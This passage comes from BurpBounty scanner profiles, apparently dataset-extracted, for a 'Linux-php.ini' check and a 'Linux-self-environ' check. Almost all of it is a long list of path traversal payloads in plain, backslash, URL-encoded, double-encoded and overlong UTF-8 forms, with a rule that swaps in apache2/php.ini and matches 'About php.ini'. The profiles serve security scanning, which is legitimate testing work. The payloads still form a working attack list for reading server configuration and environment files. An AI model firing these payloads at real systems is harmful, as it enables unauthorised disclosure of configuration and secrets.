"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,About php.ini"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-php.ini",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-php.ini",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "apache2/php.ini",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-self-environ.bb | [
{
"ProfileName": "Linux-self-environ",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
